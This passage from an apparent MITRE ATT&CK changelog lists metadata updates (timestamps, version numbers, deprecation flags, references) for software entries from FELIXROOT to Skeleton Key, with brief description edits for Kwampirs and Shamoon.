x_mitre_version1.21.3

[S0267] FELIXROOT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:23:47.799000+00:002024-04-11 02:33:38.488000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.12.2

[S0618] FIVEHANDS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 17:52:32.865000+00:002024-04-11 02:33:06.963000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0383] FlawedGrace

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-06-07 18:47:42.365000+00:002024-04-11 02:32:31.883000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0661] FoggyWeb

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 16:34:44.709000+00:002024-04-11 02:32:04.884000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1044] FunnyDream

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-11 12:33:19.525000+00:002024-04-11 02:30:25.854000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0410] Fysbis

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-01 16:58:20.224000+00:002024-04-11 02:29:45.766000+00:00
x_mitre_version1.31.4

[S0168] Gazer

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-12-04 21:07:22.870000+00:002024-04-11 02:28:51.206000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0666] Gelsemium

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 19:02:24.792000+00:002024-04-11 02:28:01.735000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0588] GoldMax

Current version: 2.3

Version changed from: 2.2 → 2.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-30 16:31:52.140000+00:002024-04-11 02:26:45.606000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.22.3

[S0493] GoldenSpy

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-08-19 16:31:40.508000+00:002024-04-11 02:27:23.911000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0531] Grandoreiro

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 19:05:29.235000+00:002024-04-11 02:25:51.549000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0237] GravityRAT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 20:44:34.524000+00:002024-04-11 02:25:20.119000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0342] GreyEnergy

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:44:35.685000+00:002024-04-11 02:24:46.255000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0391] HAWKBALL

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:46:39.617000+00:002024-04-11 02:23:13.352000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0232] HOMEFRY

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:47:38.393000+00:002024-04-11 02:18:12.743000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0376] HOPLIGHT

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-28 20:24:33.471000+00:002024-02-09 19:24:50.164000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0170] Helminth

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-28 21:35:13.610000+00:002024-04-11 02:22:38.177000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0697] HermeticWiper

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 23:19:38.268000+00:002024-04-11 02:22:04.078000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0698] HermeticWizard

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 00:11:44.579000+00:002024-04-11 02:21:28.830000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1027] Heyoka Backdoor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 18:54:09.655000+00:002024-04-11 02:20:55.694000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[S0087] Hi-Zor

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:57:16.085000+00:002024-04-11 02:20:26.551000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0394] HiddenWasp

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 20:07:01.487000+00:002024-04-11 02:19:50.306000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0601] Hildegard

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:49:39.189000+00:002024-04-11 02:18:41.342000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0431] HotCroissant

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-06 19:28:21.746000+00:002024-04-11 02:17:38.807000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0398] HyperBro

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-11-29 21:48:51.029000+00:002024-04-11 02:16:42.727000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.21.3

[S0483] IcedID

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-08-14 14:25:53.721000+00:002024-04-11 02:16:08.503000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0357] Impacket

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-27 15:31:10.648000+00:002024-03-14 17:27:34.759000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6

[S0581] IronNetInjector

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-20 17:02:59.587000+00:002024-04-11 02:14:36.791000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0044] JHUHUGIT

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:51:56.323000+00:002024-04-11 01:49:50.568000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.12.2

[S1051] KEYPLUG

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-12-12 15:47:46.797000+00:002024-04-11 01:46:20.169000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0526] KGH_SPY

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 13:42:18.822000+00:002024-04-11 01:45:40.875000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0356] KONNI

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-13 17:26:25.143000+00:002024-04-11 01:44:46.026000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.02.1

[S0487] Kessel

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-08-10 19:43:38.144000+00:002024-04-11 01:48:38.105000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1020] Kevin

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-31 16:38:11.028000+00:002024-04-17 22:07:06.736000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0387] KeyBoy

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Bart Parys']
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:22:36.377000+00:002024-04-18 18:25:18.520000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0236] Kwampirs

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1[Kwampirs](https://attack.mitre.org/software/S0236) is a bact1[Kwampirs](https://attack.mitre.org/software/S0236) is a bac
>kdoor Trojan used by [Orangeworm](https://attack.mitre.org/g>kdoor Trojan used by [Orangeworm](https://attack.mitre.org/g
>roups/G0071). It has been found on machines which had softwa>roups/G0071). [Kwampirs](https://attack.mitre.org/software/S
>re installed for the use and control of high-tech imaging de>0236) has been found on machines which had software installe
>vices such as X-Ray and MRI machines. (Citation: Symantec Or>d for the use and control of high-tech imaging devices such 
>angeworm April 2018)>as X-Ray and MRI machines.(Citation: Symantec Orangeworm Apr
 >il 2018) [Kwampirs](https://attack.mitre.org/software/S0236)
 > has multiple technical overlaps with [Shamoon](https://atta
 >ck.mitre.org/software/S0140) based on reverse engineering an
 >alysis.(Citation: Cylera Kwampirs 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-18 22:06:42.386000+00:002024-04-11 01:44:05.770000+00:00
description[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). [Kwampirs](https://attack.mitre.org/software/S0236) has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines.(Citation: Symantec Orangeworm April 2018) [Kwampirs](https://attack.mitre.org/software/S0236) has multiple technical overlaps with [Shamoon](https://attack.mitre.org/software/S0140) based on reverse engineering analysis.(Citation: Cylera Kwampirs 2022)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[S0349] LaZagne

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-03 18:35:09.021000+00:002024-04-04 03:49:27.035000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GitHub LaZange Dec 2018', 'description': 'Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.', 'url': 'https://github.com/AlessandroZ/LaZagne'}

[S0395] LightNeuron

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:59:20.670000+00:002024-04-11 01:37:19.602000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0451] LoudMiner

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-22 04:51:42.922000+00:002024-04-11 01:36:42.906000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[S1060] Mafalda

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-04 21:05:06.549000+00:002024-04-11 00:49:47.226000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0530] Melcoz

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-12-22 21:20:18.142000+00:002024-03-29 18:12:59.212000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0455] Metamorfo

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-18 23:23:55.295000+00:002024-04-11 00:44:30.028000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.02.1

[S0339] Micropsia

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:03:01.353000+00:002024-04-11 00:43:46.245000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S1015] Milan

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-31 21:45:17.174000+00:002024-04-11 00:43:16.261000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0002] Mimikatz

Current version: 1.9

Version changed from: 1.8 → 1.9

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-27 15:33:07.594000+00:002024-02-09 21:31:30.227000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.81.9

[S0284] More_eggs

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 19:15:17.339000+00:002024-04-11 00:40:07.038000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.03.1

[S0256] Mosquito

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 19:19:33.603000+00:002024-04-11 00:38:26.326000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0228] NanHaiShu

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-06-23 20:05:03.169000+00:002024-04-11 00:37:11.186000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0039] Net

Current version: 2.6

Version changed from: 2.5 → 2.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-07-25 19:25:59.767000+00:002024-02-01 04:34:30.855000+00:00
external_references[2]['url']http://windowsitpro.com/windows/netexe-referencehttps://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.52.6

[S0352] OSX_OCEANLOTUS.D

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-12 20:21:08.235000+00:002024-04-11 00:28:52.310000+00:00
x_mitre_version3.03.1

[S0613] PS1

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-05 16:04:51.193000+00:002024-04-11 00:25:13.397000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S1050] PcShare

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 14:12:41.582000+00:002024-04-11 00:28:17.175000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0587] Penquin

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-20 04:12:29.037000+00:002024-04-11 00:27:30.199000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0501] PipeMon

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 19:38:46.705000+00:002024-04-11 00:26:37.214000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0012] PoisonIvy

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-20 22:03:44.669000+00:002024-02-14 19:16:01.583000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[S0113] Prikormka

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 01:42:59.312000+00:002024-04-11 00:25:44.638000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.31.4

[S0029] PsExec

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-09 18:07:11.859000+00:002024-04-04 03:50:11+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.51.6

[S1032] PyDCrypt

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 18:54:58.048000+00:002024-04-11 00:23:58.415000+00:00
x_mitre_attack_spec_version3.0.03.2.0
x_mitre_version1.01.1

[S0650] QakBot

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-05-01 17:05:20.902000+00:002023-12-05 20:22:37.368000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0662] RCSession

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 19:54:58.293000+00:002024-04-11 00:21:49.455000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0496] REvil

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-26 20:06:33.317000+00:002024-04-11 00:15:32.724000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.12.2

[S0565] Raindrop

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-27 19:53:24.461000+00:002024-04-11 00:23:21.599000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0629] RainyDay

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-19 19:14:14.922000+00:002024-04-11 00:22:35.591000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S1040] Rclone

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-13 13:14:41.257000+00:002024-04-04 03:50:32.975000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.01.1

[S0172] Reaver

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:02:42.727000+00:002024-04-11 00:21:09.543000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0153] RedLeaves

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-23 15:14:18.594000+00:002024-04-11 00:17:52.256000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2

[S0375] Remexi

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:04:25.880000+00:002024-04-11 00:17:12.008000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0125] Remsec

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-28 20:28:28.088000+00:002024-04-11 00:16:18.864000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3

[S0433] Rifdoor

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-05-08 00:24:24.402000+00:002024-04-11 00:14:59.199000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0448] Rising Sun

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 15:46:29.677000+00:002024-04-11 00:14:23.264000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.02.1

[S1037] STARWHALE

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-14 15:23:17.961000+00:002024-04-11 00:01:29.506000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0559] SUNBURST

Current version: 2.5

Version changed from: 2.4 → 2.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-27 20:01:39.552000+00:002023-12-26 19:44:49.643000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.42.5

[S0578] SUPERNOVA

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 23:00:41.648000+00:002024-04-10 23:45:34.261000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0074] Sakula

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:13:29.169000+00:002024-04-11 00:10:10.398000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0370] SamSam

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2019-04-18 20:59:56.853000+00:002024-04-11 00:09:42.414000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0345] Seasalt

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 19:18:10.963000+00:002024-04-11 00:08:51.818000+00:00
external_references[2]['url']https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.ziphttps://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[S0140] Shamoon

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1[Shamoon](https://attack.mitre.org/software/S0140) is wiper t1[Shamoon](https://attack.mitre.org/software/S0140) is wiper 
>malware that was first used by an Iranian group known as the>malware that was first used by an Iranian group known as the
> "Cutting Sword of Justice" in 2012. Other versions known as> "Cutting Sword of Justice" in 2012. Other versions known as
> Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Sh> Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Sh
>amoon](https://attack.mitre.org/software/S0140) has also bee>amoon](https://attack.mitre.org/software/S0140) has also bee
>n seen leveraging [RawDisk](https://attack.mitre.org/softwar>n seen leveraging [RawDisk](https://attack.mitre.org/softwar
>e/S0364) and Filerase to carry out data wiping tasks. The te>e/S0364) and Filerase to carry out data wiping tasks. Analys
>rm Shamoon is sometimes used to refer to the group using the>is has linked [Shamoon](https://attack.mitre.org/software/S0
> malware as well as the malware itself.(Citation: Palo Alto >140) with [Kwampirs](https://attack.mitre.org/software/S0236
>Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation:>) based on multiple shared artifacts and coding patterns.(Ci
> Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)>tation: Cylera Kwampirs 2022) The term Shamoon is sometimes 
 >used to refer to the group using the malware as well as the 
 >malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citati
 >on: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(
 >Citation: FireEye Shamoon Nov 2016)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:42:15.121000+00:002024-02-08 20:53:17.332000+00:00
description[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. Analysis has linked [Shamoon](https://attack.mitre.org/software/S0140) with [Kwampirs](https://attack.mitre.org/software/S0236) based on multiple shared artifacts and coding patterns.(Citation: Cylera Kwampirs 2022) The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Cylera Kwampirs 2022', 'description': 'Pablo Rincón Crespo. (2022, January). The link between Kwampirs (Orangeworm) and Shamoon APTs. Retrieved February 8, 2024.', 'url': 'https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf'}

[S1019] Shark

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-31 21:47:57.382000+00:002024-04-11 00:08:18.570000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.01.1

[S0007] Skeleton Key

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-18 16:17:41.437000+00:002024-02-06 19:02:00.781000+00:00
